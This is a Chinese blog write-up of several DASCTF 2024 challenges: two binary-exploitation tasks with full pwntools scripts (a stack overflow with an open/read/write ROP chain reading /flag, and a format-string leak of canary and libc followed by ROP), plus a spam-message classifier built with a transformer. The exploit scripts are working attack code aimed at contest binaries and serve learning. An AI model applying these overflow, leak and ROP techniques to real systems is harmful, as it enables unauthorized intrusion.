DASCTF 2024 第一场部分writeup

前言

CTF新人,两个月前利用一些琐碎的时间来学习比较基础的知识,有很多题目没有思路,但是pwn部分还是相对比较友好的,分享几个自己做出来的题的思路,如果有一些知识上的错误或者建议,烦请老师傅们进行指教,会对我的成长有很大帮助,谢谢!。

PWN

Control

checksec control
Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

首先查看main

发现**gift** 中只读取 0x10 字节。

然后进入vuln中 存在栈溢出

首先盖缓冲区一直盖到rip,然后跳到gift位置,要注意还原Unwind_RaiseException的指针,使得异常正确捕获 然后ROP

p.send(flat(
    b'f'*0x20,
    b'/flag\x00\x00\x00',
    pop_rdi, flag_addr,
    pop_rsi, 0,
    pop_rdx, 0,
    open, # open
    pop_rdi, 3,
    pop_rsi, bss_addr,
    pop_rdx, 0x100,
    read, # read
    pop_rdi, 1,
    pop_rsi, bss_addr,
    pop_rdx, 0x100,
    write
))

整体exp

from pwn import *
# p = remote("node5.buuoj.cn",25728)
p = process("./control")
context.arch = 'amd64'
context.log_level = 'debug'
context.terminal = ['tmux','splitw','-h']

bss_addr = 0x4D4400
bss_addr2 = 0x4D3100

gift_addr = 0x4D3350
magic_addr = 0x402183

sys_read = 0x4621A7

obj_point = 0x4D3320
p.sendlineafter("Gift> ",flat(0x4d33a0,magic_addr))
payload = b'a'*0x70 + p64(gift_addr)
p.sendlineafter("How much do you know about control?", payload)

flag_addr = gift_addr

read = 0x462170
write = 0x462210
open = 0x462040
pop_rdi = 0x0000000000401c72
pop_rsi = 0x0000000000405285
pop_rdx = 0x0000000000401aff

# pause()

p.send(flat(
    b'f'*0x20,
    b'/flag\x00\x00\x00',
    pop_rdi, flag_addr,
    pop_rsi, 0,
    pop_rdx, 0,
    open, # open
    pop_rdi, 3,
    pop_rsi, bss_addr,
    pop_rdx, 0x100,
    read, # read
    pop_rdi, 1,
    pop_rsi, bss_addr,
    pop_rdx, 0x100,
    write
))
# gdb.attach(p)
p.interactive()

Exception

checksec exception 
zephyr@zephyr-virtual-machine:~/studyingtable/basctf/aa$ checksec exception
[*] '/home/zephyr/studyingtable/basctf/aa/exception'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

保护全开,但存在fmt

构造payload都泄露泄露

printf_payload =  b'%p-%p-%p-%p-%p-%p-%p-%19$p-'

然后同样注意恢复Unwind_RaiseException的指针,然后由于有Canary,应当控制rbp还原一下canary

最后ROP

from pwn import *
from LibcSearcher import *
# p = process('./exception')
p = remote("node5.buuoj.cn",28637)
context.terminal = ['tmux','splitw','-h']
# elf = ELF('./easyFMT')
context.arch = 'amd64'
context.log_level = 'debug'
printf_payload =  b'%p-%p-%p-%p-%p-%p-%p-%19$p-'
p.sendafter("please tell me your name\n",printf_payload)
leak = p.recvline().decode('utf-8').split("-")

print(leak)

elf_base = int(leak[0], 16) - (0x6433b8b6d060 - 0x6433b8b6c000) - 0x3000
libc_base = int(leak[2], 16) - (0x7f5a392ae1f2 - 0x7f5a391a0000)
ld_base = int(leak[4], 16) - (0x7f86e8789d60 - 0x7f86e8778000)
canary = int(leak[6], 16)
stack_leak = int(leak[7], 16)

what_addr = elf_base + 0x613e02e46408 - 0x613e02e45000

pop_rdi = elf_base + 0x00000000000014e3
pop_rsi_r15 = elf_base + 0x00000000000014e1

payload = flat(
    b'a' * 0x70,
    stack_leak - 0x2918 + 0x18,
    what_addr,
    # 填充
    b'a'*0x28,
    pop_rdi,
    libc_base + 0x00000000001b45bd,
    pop_rsi_r15, 
    0,
    0,
    libc_base + 0x7378c9f70290 - 0x7378c9f1e000,
)
p.sendlineafter("How much do you know about exception?",payload)

p.interactive()

MISC

BadMes

获取数据集,发现只有消息,没有标签,先利用transformer+Kmeans做聚类打标签

import tensorflow as tf
from tensorflow.keras.layers import TextVectorization, Embedding, MultiHeadAttention, Dense, LayerNormalization, Dropout, GlobalAveragePooling1D, Input
from tensorflow.keras.models import Model
import pandas as pd
import chardet
from sklearn.cluster import KMeans
import numpy as np

# 使用open函数打开文件,并忽略解码错误
with open('data_2.csv', 'r', encoding='gb2312', errors='ignore') as file:
    data = pd.read_csv(file)
texts = data['message'].astype(str).tolist()

# 数据预处理:文本向量化
max_tokens = 20000
max_len = 256
text_vectorization = TextVectorization(max_tokens=max_tokens, output_sequence_length=max_len)
text_vectorization.adapt(texts)

# Transformer Block Layer
class TransformerBlock(tf.keras.layers.Layer):
    def __init__(self, embed_dim, num_heads, ff_dim, rate=0.1):
        super(TransformerBlock, self).__init__()
        self.att = MultiHeadAttention(num_heads=num_heads, key_dim=embed_dim)
        self.ffn = tf.keras.Sequential(
            [Dense(ff_dim, activation="relu"), Dense(embed_dim)]
        )
        self.layernorm1 = LayerNormalization(epsilon=1e-6)
        self.layernorm2 = LayerNormalization(epsilon=1e-6)
        self.dropout1 = Dropout(rate)
        self.dropout2 = Dropout(rate)

    def call(self, inputs, training=False):
        attn_output = self.att(inputs, inputs)
        attn_output = self.dropout1(attn_output, training=training)
        out1 = self.layernorm1(inputs + attn_output)
        ffn_output = self.ffn(out1)
        ffn_output = self.dropout2(ffn_output, training=training)
        return self.layernorm2(out1 + ffn_output)

# 构建模型
embed_dim = 32  # Embedding size for each token
num_heads = 2  # Number of attention heads
ff_dim = 32  # Hidden layer size in feed forward network inside transformer

inputs = Input(shape=(), dtype=tf.string)  # 确保输入是一维的
x = text_vectorization(inputs)
x = Embedding(max_tokens, embed_dim)(x)
x = TransformerBlock(embed_dim, num_heads, ff_dim)(x)
x = GlobalAveragePooling1D()(x)

model = Model(inputs=inputs, outputs=x)

# 预测文本的嵌入表示,这里直接使用原始文本数据
x_embeddings = model.predict(texts)  # 直接传递原始文本列表

# 应用K-means聚类
kmeans = KMeans(n_clusters=2, random_state=42)
kmeans.fit(x_embeddings)
cluster_labels = kmeans.labels_  # 获取聚类标签

# 将聚类结果附加到原始数据
data['cluster'] = cluster_labels
data.to_csv('saved.csv')
print(data.head())

人为修正一些标签之后,用transformer训练

message,cluster
到达目的地后全车x个人开始腹泻,0
是浙江建德市低压电器产业生态的真实变迁,0
胡萝卜素增加3倍、维生素Bl2增加4倍、维生素C增加4,0
高管都需要KPI就没资格做高管,0
护士一检查惊呼怎么牙都蛀成这样了,0
x.x-x.x来张家边苏宁!抢美的空调! 预存xx元:最低=xxx元,最高=xxxx元!预约电话:李店长:xxxxxxxxxxx,1
火箭休赛期总结:可冲击西部冠军惧怕三劲敌,0
中国陆军总兵力有步兵182个师、另加46个独立旅,0
可是黑龙江的贪官腐败分子怎么就揪不出来呀,0
喜欢?卫星15052350470,0
除非因疾病的非正常原因或到法定退休年龄退出,0
发个QQ消息让所有同学回学校办理,0
【hongkee旗舰店】#女人节大促温暖登场#全场x.x折起,新款x.x折仍可用优惠券,x.x当日更有iphonexplus等大奖等亲来拿!,1
破获盗窃电线、电动机等案件10起,0
import pandas as pd
import numpy as np
import tensorflow as tf
from tensorflow.keras.layers import TextVectorization, Embedding, MultiHeadAttention, Dense, LayerNormalization, Dropout, GlobalAveragePooling1D, Input
from tensorflow.keras.models import Model
from sklearn.model_selection import train_test_split

def data_generator(filename, batch_size):
    while True:
        texts, labels = [], []
        with open(filename, 'r', encoding='utf-8') as file:
            next(file)  # 跳过文件头(如果存在)
            for line in file:
                if len(texts) == batch_size:
                    yield (np.array(texts), np.array(labels))
                    texts, labels = [], []  # 重置,准备下一批次
                index, label, message = line.strip().split('\t')
                texts.append(message)
                labels.append(int(label))
            if texts:
                yield (np.array(texts), np.array(labels))  # 输出最后一批数据

# Define TextVectorization outside the model to adapt it on a sample dataset
sample_texts = ['Sample text data for vectorization.']  # Example text
text_vectorization = TextVectorization(max_tokens=10000, output_sequence_length=128)
text_vectorization.adapt(sample_texts)

# Transformer Block Layer
class TransformerBlock(tf.keras.layers.Layer):
    def __init__(self, embed_dim, num_heads, ff_dim, rate=0.1):
        super(TransformerBlock, self).__init__()
        self.att = MultiHeadAttention(num_heads=num_heads, key_dim=embed_dim)
        self.ffn = tf.keras.Sequential([
            Dense(ff_dim, activation="relu"), 
            Dense(embed_dim)
        ])
        self.layernorm1 = LayerNormalization(epsilon=1e-6)
        self.layernorm2 = LayerNormalization(epsilon=1e-6)
        self.dropout1 = Dropout(rate)
        self.dropout2 = Dropout(rate)

    def call(self, inputs, training=False):
        attn_output = self.att(inputs, inputs)
        attn_output = self.dropout1(attn_output, training=training)
        out1 = self.layernorm1(inputs + attn_output)
        ffn_output = self.ffn(out1)
        ffn_output = self.dropout2(ffn_output, training=training)
        return self.layernorm2(out1 + ffn_output)

# Model building
embed_dim = 32
num_heads = 2
ff_dim = 32
inputs = Input(shape=(), dtype=tf.string)  # 正确:期望每个输入是单独的字符串
x = text_vectorization(inputs)  # 将文本向量化应用于输入

x = Embedding(10000, embed_dim)(x)
x = TransformerBlock(embed_dim, num_heads, ff_dim)(x)
x = GlobalAveragePooling1D()(x)
outputs = Dense(1, activation='sigmoid')(x)
model = Model(inputs=inputs, outputs=outputs)

model.compile(optimizer="adam", loss="binary_crossentropy", metrics=["accuracy"])

# Training model using generator
train_gen = data_generator('80w.txt', batch_size=32)
valid_gen = data_generator('80w.txt', batch_size=32)  # Ideally, use a separate validation file or method

model.fit(train_gen, steps_per_epoch=100, epochs=200, validation_data=valid_gen, validation_steps=10)

# # 测试数据生成器
# test_gen = data_generator('test_data.txt', 32)  # 假设你有一个分开的测试数据集文件

# # 使用生成器进行模型评估
# test_loss, test_acc = model.evaluate(test_gen, steps=10)  # 确保提供足够的测试步骤
# print(f"Test Accuracy: {test_acc}")

# Save model
model.save("transformer_binary_classification_model")

然后写一个socket链接脚本,循环打

import socket
import tensorflow as tf
import numpy as np

# 加载整个模型(假设模型和TextVectorization一起保存)
model = tf.keras.models.load_model("transformer_binary_classification_model")

# 连接到nc服务器
host = '4.216.46.225'  # 服务器IP地址
port = 2333  # 服务器端口号

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((host, port))
    print("Connected to nc server.")

    try:
        while True:
            # 从nc服务器接收消息
            received_data = s.recv(1024).decode("utf-8")
            if not received_data:
                print("No more data from server. Exiting.")
                break
            print("Received message from nc server:", received_data)

            # 处理接收到的消息
            processed_data = np.array([received_data])  # 将接收的消息包装为NumPy数组
            prediction = model.predict(processed_data)[0][0]  # 进行分类预测
            result = 1 if prediction > 0.55 else 0  # 将预测结果转换为0或1

            # 将分类结果发送给nc服务器
            s.sendall(str(result).encode("utf-8"))
            print("Classification result sent to nc server.")
    except KeyboardInterrupt:
        print("Disconnected from server.")
    except Exception as e:
        print(f"An error occurred: {e}")

在训练300轮下,accuracy可以达到95.8% 最好情况下261/300

  • 7
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值